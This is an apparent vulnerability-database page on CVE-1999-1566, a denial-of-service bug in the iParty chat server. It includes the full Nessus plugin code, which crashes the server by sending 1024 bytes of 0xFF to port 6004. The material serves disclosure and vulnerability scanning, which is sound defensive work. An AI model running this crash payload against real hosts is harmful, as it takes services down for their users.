Attack vector
NETWORK Attack complexity
LOW Privileges required
NONE Confidentiality impact
NONE Integrity impact
NONE Availability impact
PARTIAL network
low complexity
intel
nessus
exploit available
Published: 1999-05-08
Updated: 2008-09-05
Summary
Buffer overflow in iParty server 1.2 and earlier allows remote attackers to cause a denial of service (crash) by connecting to default port 6004 and sending repeated extended characters.
Vulnerable Configurations
| Part | Description | Count |
| Application | Intel | 2 |
Exploit-Db
| description | iParty Conferencing Server Denial Of Service Vulnerability. CVE-1999-1566. Dos exploits for multiple platform |
| id | EDB-ID:22250 |
| last seen | 2016-02-02 |
| modified | 1999-05-08 |
| published | 1999-05-08 |
| reporter | wh00t |
| source | https://www.exploit-db.com/download/22250/ |
| title | iParty Conferencing Server Denial of Service Vulnerability |
Nessus
| NASL family | Windows |
| NASL id | IPARTY.NASL |
| description | iParty is an audio/text chat program for Windows. The iParty server listens on port 6004 for client requests. If someone connects to it and sends a large amount of ASCII 255 chars, the server will close itself and disconnect all the current users. |
| last seen | 2020-06-01 |
| modified | 2020-06-02 |
| plugin id | 10111 |
| published | 1999-06-22 |
| reporter | This script is Copyright (C) 1999-2018 Tenable Network Security, Inc. |
| source | https://www.tenable.com/plugins/nessus/10111 |
| title | iParty Client Extended Character Handling Remote Overflow DoS |
| code | #
# (C) Tenable Network Security, Inc.
#
include("compat.inc");
if (description)
{
script_id(10111);
script_version("1.27");
script_cvs_date("Date: 2018/07/12 19:01:17");
script_cve_id("CVE-1999-1566");
script_bugtraq_id(6844);
script_name(english:"iParty Client Extended Character Handling Remote Overflow DoS");
script_summary(english:"Shuts down a iParty server");
script_set_attribute(attribute:"synopsis", value:
"The remote host is has a chat program installed that is affected by a
remote denial of service vulnerability.");
script_set_attribute(attribute:"description", value:
"iParty is an audio/text chat program for Windows. The iParty server
listens on port 6004 for client requests. If someone connects to it
and sends a large amount of ASCII 255 chars, the server will close
itself and disconnect all the current users.");
script_set_attribute(attribute:"solution", value:"There is no known solution at this time.");
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");
script_set_cvss_temporal_vector("CVSS2#E:POC/RL:U/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"vuln_publication_date", value:"1998/11/30");
script_set_attribute(attribute:"plugin_publication_date", value:"1999/06/22");
script_set_attribute(attribute:"potential_vulnerability", value:"true");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_end_attributes();
script_category(ACT_DENIAL);
script_copyright(english:"This script is Copyright (C) 1999-2018 Tenable Network Security, Inc.");
script_family(english:"Windows");
script_require_keys("Settings/ParanoidReport");
script_require_ports(6004);
exit(0);
}
include("audit.inc");
include("global_settings.inc");
if (report_paranoia < 2) audit(AUDIT_PARANOID);
if(get_port_state(6004))
{
soc = open_sock_tcp(6004);
if(soc)
{
asc = raw_string(0xFF);
data = crap(data:asc, length:1024);
send(socket:soc, data:data);
close(soc);
soc2 = open_sock_tcp(6004);
if(!soc2)security_warning(6004);
else close(soc2);
}
}
|